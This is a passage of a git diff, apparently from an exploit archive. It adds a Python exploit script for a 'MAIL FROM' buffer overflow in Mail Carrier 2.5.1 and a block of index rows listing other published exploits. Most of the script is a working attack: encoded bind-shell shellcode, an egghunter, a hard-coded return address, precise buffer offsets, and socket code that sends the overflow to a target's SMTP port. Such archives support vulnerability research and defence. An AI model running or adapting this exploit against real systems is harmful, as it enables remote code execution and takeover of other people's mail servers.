sys +import socket +import time + +if len(sys.argv) < 2: + print "[-]Usage: %s " % sys.argv[0] + + sys.exit(0) + +ipaddr=sys.argv[1] +port=25 + +callebx="\xb1\x32\x9c\x0f" +sled="\x90" * 8 +egg="T00WT00W" + +pay=egg + +#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e +x86/shikata_ga_nai -f py | sed 's/buf/pay/g' +#[-] No platform was selected, choosing Msf::Module::Platform::Windows +from the payload +#[-] No arch selected, selecting arch: x86 from the payload +#Found 1 compatible encoders +#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai +#x86/shikata_ga_nai succeeded with size 355 (iteration=0) +#x86/shikata_ga_nai chosen with final size 355 +#Payload size: 355 bytes +#Final size of py file: 1710 bytes + +pay += "\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c" +pay += "\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f" +pay += "\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44" +pay += "\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f" +pay += "\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62" +pay += "\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2" +pay += "\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3" +pay += "\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71" +pay += "\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57" +pay += "\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18" +pay += "\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57" +pay += "\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19" +pay += "\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76" +pay += "\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7" +pay += "\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98" +pay += "\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99" +pay += "\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb" +pay += "\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39" +pay += "\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b" +pay += "\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf" +pay += "\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed" +pay += "\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c" +pay += "\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6" +pay += "\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15" +pay += "\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31" +pay += "\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33" +pay += "\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f" +pay += "\xce\xdd\x9e\x15" + +egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +# Build the Buffer +buffer="A" * 700 # 5088 to EIP +buffer+=pay +buffer+="B" * (5088 - (700 + len(pay))) +buffer+=callebx # Overwrite EIP with Call EBX in c:\Windows\System32\expsrv.dll +buffer+=sled # 5100 bytes mark +buffer+="C" * 516 # This put us at the EBX register +buffer+=sled # NOPS +buffer+=egghunter +buffer+="D" * (5900 - len(buffer)) # Padding + +try: + print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port + s.recv(1024) # receive banner + s.send('EHLO root@localhost \r\n') # send EHLO + s.recv(1024) # receive reply + s.send('MAIL FROM: ' + buffer + '\r\n') # Send the phony Mail From + s.recv(1024) + s.send('RCPT TO: evelyn@evelyn \r\n') + s.send('QUIT\r\n') + s.close() + time.sleep(1) + print "[-] Done!" +except: + print "[-] Could not connect to target" + exit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bc3231bb3..59ba5898f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17253,6 +17253,7 @@ id,file,description,date,author,type,platform,port 46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows, 46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows, 46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple, +46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40987,3 +40988,9 @@ id,file,description,date,author,type,platform,port 46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443 46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php, 46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80 +46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple, +46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80 +46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80 +46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80 +46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80 +46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80